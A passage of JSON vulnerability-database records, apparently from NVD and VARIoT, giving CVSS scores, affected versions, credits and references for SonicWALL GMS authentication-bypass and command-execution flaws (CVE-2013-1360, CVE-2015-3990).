"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-02-11T16:15:12.227",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Broken Link"
],
"url": "http://archives.neohapsis.com/archives/bugtraq/2013-01/0075.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.exploit-db.com/exploits/24203"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/57446"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securitytracker.com/id/1028007"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/81366"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://packetstormsecurity.com/files/cve/CVE-2013-1360"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Broken Link"
],
"url": "http://archives.neohapsis.com/archives/bugtraq/2013-01/0075.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.exploit-db.com/exploits/24203"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/57446"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securitytracker.com/id/1028007"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/81366"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://packetstormsecurity.com/files/cve/CVE-2013-1360"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-287"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
var-202002-0533
Vulnerability from variot
An Authentication Bypass vulnerability exists in DELL SonicWALL Global Management System (GMS) 4.1, 5.0, 5.1, 6.0, and 7.0, Analyzer 7.0, Universal Management Appliance (UMA) 5.1, 6.0, and 7.0 and ViewPoint 4.1, 5.0, and 6.0 via a crafted request to the SGMS interface, which could let a remote malicious user obtain administrative access. plural SonicWALL The product contains an authentication vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Attackers can exploit this issue to gain administrative access to the web interface that could fully compromise the system. The following versions are affected: GMS/Analyzer/UMA 7.0.x GMS/ViewPoint/UMA 6.0.x GMS/ViewPoint/UMA 5.1.x GMS/ViewPoint 5.0.x GMS/ViewPoint 4.1.x. SonicWALL is a full-featured Internet security appliance designed specifically for large networks with ever-growing VPN needs. Authorization vulnerabilities exist in several DELL SonicWALL products
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202002-0533",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "analyzer",
"scope": "eq",
"trust": 1.8,
"vendor": "sonicwall",
"version": "7.0"
},
{
"model": "global management system",
"scope": "eq",
"trust": 1.8,
"vendor": "sonicwall",
"version": "4.1"
},
{
"model": "global management system",
"scope": "eq",
"trust": 1.8,
"vendor": "sonicwall",
"version": "5.0"
},
{
"model": "global management system",
"scope": "eq",
"trust": 1.8,
"vendor": "sonicwall",
"version": "5.1"
},
{
"model": "global management system",
"scope": "eq",
"trust": 1.8,
"vendor": "sonicwall",
"version": "6.0"
},
{
"model": "global management system",
"scope": "eq",
"trust": 1.8,
"vendor": "sonicwall",
"version": "7.0"
},
{
"model": "universal management appliance",
"scope": "eq",
"trust": 1.8,
"vendor": "sonicwall",
"version": "5.1"
},
{
"model": "universal management appliance",
"scope": "eq",
"trust": 1.8,
"vendor": "sonicwall",
"version": "6.0"
},
{
"model": "universal management appliance",
"scope": "eq",
"trust": 1.8,
"vendor": "sonicwall",
"version": "7.0"
},
{
"model": "viewpoint",
"scope": "eq",
"trust": 1.8,
"vendor": "sonicwall",
"version": "4.1"
},
{
"model": "viewpoint",
"scope": "eq",
"trust": 1.8,
"vendor": "sonicwall",
"version": "5.0"
},
{
"model": "viewpoint",
"scope": "eq",
"trust": 1.8,
"vendor": "sonicwall",
"version": "6.0"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-007212"
},
{
"db": "NVD",
"id": "CVE-2013-1360"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sonicwall:analyzer:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:global_management_system:4.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:global_management_system:5.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:global_management_system:5.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:global_management_system:6.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:global_management_system:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:universal_management_appliance:5.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:universal_management_appliance:6.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:universal_management_appliance:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:viewpoint:4.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:viewpoint:5.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:viewpoint:6.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2013-1360"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Nikolas Sotiriu",
"sources": [
{
"db": "BID",
"id": "57446"
},
{
"db": "CNNVD",
"id": "CNNVD-201301-376"
}
],
"trust": 0.9
},
"cve": "CVE-2013-1360",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "JVNDB-2013-007212",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-61362",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2013-007212",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2013-1360",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "JVNDB-2013-007212",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNNVD",
"id": "CNNVD-201301-376",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-61362",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-61362"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007212"
},
{
"db": "NVD",
"id": "CVE-2013-1360"
},
{
"db": "CNNVD",
"id": "CNNVD-201301-376"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An Authentication Bypass vulnerability exists in DELL SonicWALL Global Management System (GMS) 4.1, 5.0, 5.1, 6.0, and 7.0, Analyzer 7.0, Universal Management Appliance (UMA) 5.1, 6.0, and 7.0 and ViewPoint 4.1, 5.0, and 6.0 via a crafted request to the SGMS interface, which could let a remote malicious user obtain administrative access. plural SonicWALL The product contains an authentication vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. \nAttackers can exploit this issue to gain administrative access to the web interface that could fully compromise the system. \nThe following versions are affected:\nGMS/Analyzer/UMA 7.0.x\nGMS/ViewPoint/UMA 6.0.x\nGMS/ViewPoint/UMA 5.1.x\nGMS/ViewPoint 5.0.x\nGMS/ViewPoint 4.1.x. SonicWALL is a full-featured Internet security appliance designed specifically for large networks with ever-growing VPN needs. Authorization vulnerabilities exist in several DELL SonicWALL products",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-1360"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007212"
},
{
"db": "BID",
"id": "57446"
},
{
"db": "VULHUB",
"id": "VHN-61362"
}
],
"trust": 1.98
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-61362",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-61362"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-1360",
"trust": 2.8
},
{
"db": "SECTRACK",
"id": "1028007",
"trust": 2.5
},
{
"db": "BID",
"id": "57446",
"trust": 2.0
},
{
"db": "EXPLOIT-DB",
"id": "24203",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007212",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201301-376",
"trust": 0.7
},
{
"db": "SEEBUG",
"id": "SSVID-77936",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "119639",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-61362",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-61362"
},
{
"db": "BID",
"id": "57446"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007212"
},
{
"db": "NVD",
"id": "CVE-2013-1360"
},
{
"db": "CNNVD",
"id": "CNNVD-201301-376"
}
]
},
"id": "VAR-202002-0533",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-61362"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:49:50.816000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.sonicwall.com/"
},
{
"title": "Multiple SonicWALL Product verification bypass fixes",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=108874"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-007212"
},
{
"db": "CNNVD",
"id": "CNNVD-201301-376"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-287",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-61362"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007212"
},
{
"db": "NVD",
"id": "CVE-2013-1360"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://archives.neohapsis.com/archives/bugtraq/2013-01/0075.html"
},
{
"trust": 1.7,
"url": "http://www.exploit-db.com/exploits/24203"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/57446"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id/1028007"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/81366"
},
{
"trust": 1.7,
"url": "https://packetstormsecurity.com/files/cve/cve-2013-1360"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-1360"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1360"
},
{
"trust": 0.8,
"url": "https://securitytracker.com/id/1028007"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-61362"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007212"
},
{
"db": "NVD",
"id": "CVE-2013-1360"
},
{
"db": "CNNVD",
"id": "CNNVD-201301-376"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-61362"
},
{
"db": "BID",
"id": "57446"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007212"
},
{
"db": "NVD",
"id": "CVE-2013-1360"
},
{
"db": "CNNVD",
"id": "CNNVD-201301-376"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-02-11T00:00:00",
"db": "VULHUB",
"id": "VHN-61362"
},
{
"date": "2013-01-17T00:00:00",
"db": "BID",
"id": "57446"
},
{
"date": "2020-02-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-007212"
},
{
"date": "2020-02-11T16:15:12.227000",
"db": "NVD",
"id": "CVE-2013-1360"
},
{
"date": "2013-01-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201301-376"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-02-13T00:00:00",
"db": "VULHUB",
"id": "VHN-61362"
},
{
"date": "2013-01-17T00:00:00",
"db": "BID",
"id": "57446"
},
{
"date": "2020-02-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-007212"
},
{
"date": "2020-02-13T14:12:06.497000",
"db": "NVD",
"id": "CVE-2013-1360"
},
{
"date": "2020-05-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201301-376"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201301-376"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural SonicWALL Product authentication vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-007212"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201301-376"
}
],
"trust": 0.6
}
}
var-201505-0258
Vulnerability from variot
The GMS ViewPoint (GMSVP) web application in Dell Sonicwall GMS, Analyzer, and UMA EM5000 before 7.2 SP4 allows remote authenticated users to execute arbitrary commands via vectors related to configuration. Supplementary information : CWE Vulnerability type by CWE-19: Data Handling ( Data processing ) Has been identified. Authentication is required to exploit this vulnerability.The specific flaw exists within the GMS ViewPoint (GMSVP) web application. The issue lies in the handling of configuration input due to a failure to safely sanitize user data before executing a command. An attacker could leverage this vulnerability to execute code with root privileges on the underlying operating system. Multiple Dell SonicWALL Products are prone to a remote code-execution vulnerability. Successful exploitation can completely compromise the vulnerable device. GMS is a global management system for rapid deployment and centralized management of SonicWALL infrastructure. Analyzer is a set of network analyzer software for SonicWALL infrastructure. UMA EM5000 is a set of general management equipment software. The following products and versions are affected: Dell Sonicwall GMS 7.2 SP3 and earlier, Analyzer 7.2 SP3 and earlier, UMA EM5000 7.2 SP3 and earlier
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201505-0258",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "global management system",
"scope": "lte",
"trust": 1.0,
"vendor": "sonicwall",
"version": "7.2"
},
{
"model": "analyzer",
"scope": "lte",
"trust": 1.0,
"vendor": "sonicwall",
"version": "7.2"
},
{
"model": "uma em5000",
"scope": "lte",
"trust": 1.0,
"vendor": "sonicwall",
"version": "7.2"
},
{
"model": "sonicwall analyzer",
"scope": "lt",
"trust": 0.8,
"vendor": "dell",
"version": "7.2 sp4"
},
{
"model": "sonicwall global management system",
"scope": "lt",
"trust": 0.8,
"vendor": "dell",
"version": "7.2 sp4"
},
{
"model": "sonicwall e-class universal management appliance em5000",
"scope": null,
"trust": 0.8,
"vendor": "dell",
"version": null
},
{
"model": "sonicwall e-class universal management appliance em5000",
"scope": "lt",
"trust": 0.8,
"vendor": "dell",
"version": "7.2 sp4"
},
{
"model": "gms virtual appliance",
"scope": null,
"trust": 0.7,
"vendor": "sonicwall",
"version": null
},
{
"model": "global management system",
"scope": "eq",
"trust": 0.6,
"vendor": "sonicwall",
"version": "7.2"
},
{
"model": "analyzer",
"scope": "eq",
"trust": 0.6,
"vendor": "sonicwall",
"version": "7.2"
},
{
"model": "uma em5000",
"scope": "eq",
"trust": 0.6,
"vendor": "sonicwall",
"version": "7.2"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-15-231"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-002771"
},
{
"db": "NVD",
"id": "CVE-2015-3990"
},
{
"db": "CNNVD",
"id": "CNNVD-201505-424"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:sonicwall:uma_em5000_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "7.2",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:sonicwall:uma_em5000:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sonicwall:global_management_system:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "7.2",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:analyzer:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "7.2",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2015-3990"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "kernelsmith - HP Zero Day Initiative",
"sources": [
{
"db": "ZDI",
"id": "ZDI-15-231"
}
],
"trust": 0.7
},
"cve": "CVE-2015-3990",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2015-3990",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 1.5,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "VHN-81951",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
